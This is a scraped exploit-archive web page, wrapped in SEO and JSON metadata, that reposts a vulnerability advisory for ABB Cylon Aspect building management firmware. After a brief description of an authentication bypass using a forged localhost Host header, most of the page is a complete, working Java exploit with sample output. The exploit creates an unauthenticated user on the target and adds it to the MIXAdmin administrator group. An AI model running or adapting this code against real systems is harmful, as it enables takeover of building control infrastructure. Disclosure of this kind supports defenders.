ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=5851\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin Exploit ID ZSL-2025-5939 Type zeroscience Published 2025-05-22T00:00:00 Modified 2025-05-22T00:00:00 CVSS...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=5851\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-23T10:36:56+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5851#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5851\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin\",\"datePublished\":\"2025-05-23T10:36:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5851\"},\"wordCount\":1133,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-0.0\",\"exploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\",\"zeroscience\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=5851#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5851\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5851\",\"name\":\"ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-23T10:36:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5851#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=5851\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5851#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n","yoast_head_json":{"title":"ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=5851","og_locale":"en_US","og_type":"article","og_title":"ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin - zero redgem","og_description":"Exploit Details Basic Information Exploit Title ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin Exploit ID ZSL-2025-5939 Type zeroscience Published 2025-05-22T00:00:00 Modified 2025-05-22T00:00:00 CVSS...","og_url":"https:\/\/zero.redgem.net\/?p=5851","og_site_name":"zero redgem","article_published_time":"2025-05-23T10:36:56+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=5851#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=5851"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin","datePublished":"2025-05-23T10:36:56+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=5851"},"wordCount":1133,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-0.0","exploit","news","NONE","Security","tapic","Vulnerability","zeroscience"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=5851#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=5851","url":"https:\/\/zero.redgem.net\/?p=5851","name":"ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-23T10:36:56+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=5851#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=5851"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=5851#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/5851","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5851"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/5851\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5851"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5851"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5851"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

Exploit Details<\/h2>\n

CVSS Score<\/th>\n

0.0<\/td>\n<\/tr>\n

Severity<\/th>\n

NONE<\/td>\n<\/tr>\n

Vector<\/th>\n

NONE<\/td>\n<\/tr>\n<\/table>\n

CVE Information<\/h3>\n
\n
\n<\/ul>\n<\/div>\n
Exploit Description<\/h3>\n
\nTitle: ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin Advisory ID: ZSL-2025-5939 Type: Local\/Remote Impact: Security Bypass, System Access,…\n<\/div>\n
Exploit Code<\/h3>\n
\n<\/p>\n
\/<\/p>\n
ABB Cylon Aspect 3.08.03 (MIX->UserManager) Auth Bypass Create MIXAdmin<\/p>\n
Vendor: ABB Ltd.
\n
Product web page: https:\/\/www.global.abb
\n
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
\n
Firmware: <=3.08.03<\/p>\n
Summary: ASPECT is an award-winning scalable building energy management
\n
and control solution designed to allow users seamless access to their
\n
building data through standard building protocols including smart devices.<\/p>\n
Desc: ABB Cylon Aspect BMS\/BAS is vulnerable to a critical flaw in the
\n
AuthenticatedHttpServlet within its application server, enabling
\n
remote attackers to bypass authentication by setting the Host:
\n
127.0.0.1 header. This deceives the server into processing requests
\n
as if they originate from localhost, granting unauthorized access
\n
to privileged operations. Specifically, this vulnerability impacts
\n
the UserManager and GroupManager servlets, allowing unauthenticated
\n
attackers to create and remove users and groups without credentials.
\n
The flaw stems from the servlet\u2019s automatic authorization of localhost
\n
requests as the aamuser account, exposing these sensitive functions
\n
to both local and remote exploitation. By leveraging this bypass,
\n
attackers can manipulate user and group configurations, potentially
\n
escalating privileges or disrupting system access controls.<\/p>\n
————————————————————————–
\n
$ java -jar MixExploit.jar 192.168.73.31 testingus 123456 MIXAdmin
\n
[+] User ‘testingus’ added successfully.
\n
[+] Found MIXAdmin users: [aamuser, thricer, burj, redbull]
\n
[+] User ‘testingus’ added to MIXAdmin.
\n
[+] User ‘testingus’ found in UserManager.
\n
[+] User ‘testingus’ is in MIXAdmin group.
\n
————————————————————————–<\/p>\n
Tested on: GNU\/Linux 3.15.10 (armv7l)
\n
GNU\/Linux 3.10.0 (x86_64)
\n
GNU\/Linux 2.6.32 (x86_64)
\n
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
\n
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
\n
PHP\/7.3.11
\n
PHP\/5.6.30
\n
PHP\/5.4.16
\n
PHP\/4.4.8
\n
PHP\/5.3.3
\n
AspectFT Automation Application Server
\n
lighttpd\/1.4.32
\n
lighttpd\/1.4.18
\n
Apache\/2.2.15 (CentOS)
\n
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
\n
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
\n
ErgoTech MIX Deployment Server 2.0.0<\/p>\n
Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
\n
Macedonian Information Security Research and Development Laboratory
\n
Zero Science Lab – https:\/\/www.zeroscience.mk – @zeroscience<\/p>\n
Advisory ID: ZSL-2025-5939
\n
Advisory URL: https:\/\/www.zeroscience.mk\/en\/vulnerabilities\/ZSL-2025-5939.php<\/p>\n
21.04.2024<\/p>\n
\/<\/p>\n
import java.io.;
\n
import java.net.;
\n
import java.util.*;
\n
import java.util.regex.Matcher;
\n
import java.util.regex.Pattern;<\/p>\n
public class MixExploit {
\n
private static final String USER_MANAGER_URL = “\/servlets\/UserManager”;
\n
private static final String GROUP_MANAGER_URL = “\/servlets\/GroupManager?selectedGroup=MIXAdmin”;
\n
private static final int PORT = 7226;<\/p>\n
public static void main(String[] args) {
\n
if (args.length != 4) {
\n
printUsage();
\n
return;
\n
}<\/p>\n
String ip = args[0];
\n
String newUser = args[1];
\n
String password = args[2];
\n
String group = args[3];<\/p>\n
try {
\n
if (!checkServerAndUser(ip, newUser)) {
\n
System.out.println(“[-] Aborting: Either server is not AspectFT or user ‘” + newUser + “‘ already exists.”);
\n
return;
\n
}<\/p>\n
addNewUser(ip, newUser, password);
\n
System.out.println(“[+] User ‘” + newUser + “‘ added successfully.”);<\/p>\n
List mixAdminUsers = enumerateUsers(ip);
\n
System.out.println(“[+] Found MIXAdmin users: ” + mixAdminUsers);<\/p>\n
addUsersToGroup(ip, mixAdminUsers, newUser, group);
\n
System.out.println(“[+] User ‘” + newUser + “‘ added to ” + group + “.”);<\/p>\n
Thread.sleep(3000);<\/p>\n
verifyUserAdded(ip, newUser);<\/p>\n
} catch (IOException e) {
\n
System.out.println(“[-] Error: ” + e.getMessage());
\n
} catch (InterruptedException e) {
\n
System.out.println(“[-] Sleep interrupted: ” + e.getMessage());
\n
}
\n
}<\/p>\n
private static void printUsage() {
\n
System.out.println(“\\n”);
\n
System.out.println(” P R O J E C T”);
\n
System.out.println(“”);
\n
System.out.println(” .|”);
\n
System.out.println(” | |”);
\n
System.out.println(” |’| .___”);
\n
System.out.println(” _ | | |. |’ .—\\”|”);
\n
System.out.println(” _ .-‘ ‘-. | | .–‘| || | _| |”);
\n
System.out.println(” .-‘| _.| | || ‘- | | | || |”);
\n
System.out.println(” |’ | |. | || | | | | || |”);
\n
System.out.println(” _| ‘-‘ ‘ \\”\\” ‘-‘ ‘-.’ ‘` |___”);
\n
System.out.println(“\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 “);
\n
System.out.println(“\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 “);
\n
System.out.println(“\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 “);
\n
System.out.println(“\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 “);
\n
System.out.println(“\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 “);
\n
System.out.println(“\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591 “);
\n
System.out.println(“\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591”);
\n
System.out.println(” \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 “);
\n
System.out.println(” \u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591”);
\n
System.out.println(” \u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591 “);
\n
System.out.println(” \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2592\u2593\u2588\u2588\u2588\u2593\u2592\u2591”);
\n
System.out.println(” \u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591”);
\n
System.out.println(” \u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2592\u2593\u2588\u2593\u2592\u2591”);
\n
System.out.println(” \u2591\u2592\u2593\u2588\u2593\u2592\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591 \u2591\u2592\u2593\u2588\u2588\u2588\u2588\u2588\u2588\u2593\u2592\u2591”);
\n
System.out.println(“\\n”);
\n
System.out.println(“Usage: java -jar MixExploit.jar “);
\n
System.out.println(“Example: java -jar MixExploit.jar 192.168.73.31 testingus 123456 MIXAdmin”);
\n
}<\/p>\n
private static boolean checkServerAndUser(String ip, String newUser) throws IOException {
\n
String response = sendGetRequest(ip, USER_MANAGER_URL);<\/p>\n
if (!response.contains(“Server:AspectFT Automation Application Server”)) {
\n
System.out.println(“[-] Server is not AspectFT Automation Application Server.”);
\n
return false;
\n
}<\/p>\n
if (response.contains(“value='” + newUser + “‘”)) {
\n
System.out.println(“[-] User ‘” + newUser + “‘ already exists in UserManager.”);
\n
return false;
\n
}<\/p>\n
return true;
\n
}<\/p>\n
private static void addNewUser(String ip, String username, String password) throws IOException {
\n
String url = USER_MANAGER_URL;
\n
String postData = “newuser=” + URLEncoder.encode(username, “UTF-8”) +
\n
“&password=” + URLEncoder.encode(password, “UTF-8”) +
\n
“&passwordConfirm=” + URLEncoder.encode(password, “UTF-8”) +
\n
“&Insert=Add”;<\/p>\n
sendPostRequest(ip, url, postData);
\n
}<\/p>\n
private static List enumerateUsers(String ip) throws IOException {
\n
String response = sendGetRequest(ip, USER_MANAGER_URL);<\/p>\n
List mixAdminUsers = new ArrayList<>();
\n
Pattern userPattern = Pattern.compile(“<\/p>\n

.*?value='([^’]+)’.*?<\/td>\n

(.*?)<\/td>\n

“, Pattern.DOTALL);
\n
Pattern groupPattern = Pattern.compile(“GroupManager\\\\?selectedGroup=\\\\s*MIXAdmin”);<\/p>\n

Matcher userMatcher = userPattern.matcher(response);
\n
while (userMatcher.find()) {
\n
String user = userMatcher.group(1);
\n
String groups = userMatcher.group(2);
\n
if (groupPattern.matcher(groups).find()) {
\n
mixAdminUsers.add(user);
\n
}
\n
}<\/p>\n

return mixAdminUsers;
\n
}<\/p>\n

private static void addUsersToGroup(String ip, List existingUsers, String newUser, String group) throws IOException {
\n
String url = GROUP_MANAGER_URL;<\/p>\n

String preventiveRight = new StringBuilder().append(existingUsers).append(“,”).append(newUser).toString();<\/p>\n

StringBuilder newRight = new StringBuilder();
\n
for (String user : existingUsers) {
\n
newRight.append(URLEncoder.encode(user, “UTF-8”)).append(“,”);
\n
}
\n
newRight.append(URLEncoder.encode(newUser, “UTF-8”));<\/p>\n

String postData = “groupName=” + URLEncoder.encode(group, “UTF-8”) +
\n
“&removedLeft=” + URLEncoder.encode(newUser, “UTF-8”) +
\n
“&removedRight=” + URLEncoder.encode(“”, “UTF-8”) +
\n
“&addedLeft=” + URLEncoder.encode(“”, “UTF-8”) +
\n
“&addedRight=” + URLEncoder.encode(newUser, “UTF-8”) +
\n
“&newLeft=” + URLEncoder.encode(“”, “UTF-8”) +
\n
“&newRight=” + newRight.toString() +
\n
“&EditGroup=Save”;<\/p>\n

sendPostRequest(ip, url, postData);
\n
}<\/p>\n

private static void verifyUserAdded(String ip, String username) throws IOException {
\n
String response = sendGetRequest(ip, USER_MANAGER_URL);<\/p>\n

if (response.contains(“value='” + username + “‘”)) {
\n
System.out.println(“[+] User ‘” + username + “‘ found in UserManager.”);
\n
if (response.contains(“MIXAdmin”)) {
\n
System.out.println(“[+] User ‘” + username + “‘ is in MIXAdmin group.”);
\n
} else {
\n
System.out.println(“[-] User ‘” + username + “‘ not in MIXAdmin group.”);
\n
}
\n
} else {
\n
System.out.println(“[-] User ‘” + username + “‘ not found in UserManager.”);
\n
}
\n
}<\/p>\n

private static String sendPostRequest(String ip, String path, String postData) throws IOException {
\n
Socket socket = new Socket(ip, PORT);
\n
OutputStream out = socket.getOutputStream();
\n
BufferedReader in = new BufferedReader(new InputStreamReader(socket.getInputStream()));<\/p>\n

String request = “POST ” + path + ” HTTP\/1.1\\r\\n” +
\n
“Host: localhost\\r\\n” +
\n
“Content-Type: application\/x-www-form-urlencoded\\r\\n” +
\n
“Content-Length: ” + postData.length() + “\\r\\n” +
\n
“Connection: close\\r\\n” +
\n
“\\r\\n” +
\n
postData;<\/p>\n

out.write(request.getBytes(“UTF-8”));
\n
out.flush();<\/p>\n

StringBuilder response = new StringBuilder();
\n
String line;
\n
while ((line = in.readLine()) != null) {
\n
response.append(line).append(“\\n”);
\n
}<\/p>\n

socket.close();
\n
return response.toString();
\n
}<\/p>\n

private static String sendGetRequest(String ip, String path) throws IOException {
\n
Socket socket = new Socket(ip, PORT);
\n
OutputStream out = socket.getOutputStream();
\n
BufferedReader in = new BufferedReader(new InputStreamReader(socket.getInputStream()));<\/p>\n

String request = “GET ” + path + ” HTTP\/1.1\\r\\n” +
\n
“Host: localhost\\r\\n” +
\n
“Connection: close\\r\\n” +
\n
“\\r\\n”;<\/p>\n

out.write(request.getBytes(“UTF-8”));
\n
out.flush();<\/p>\n

StringBuilder response = new StringBuilder();
\n
String line;
\n
while ((line = in.readLine()) != null) {
\n
response.append(line).append(“\\n”);
\n
}<\/p>\n

socket.close();
\n
return response.toString();
\n
}
\n
}
\n
<\/string><\/tr>\n

<\/string><\/string><\/group><\/pass><\/user><\/ip><\/string><\/p>\n

<\/body><\/html>\n<\/div>\n

View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"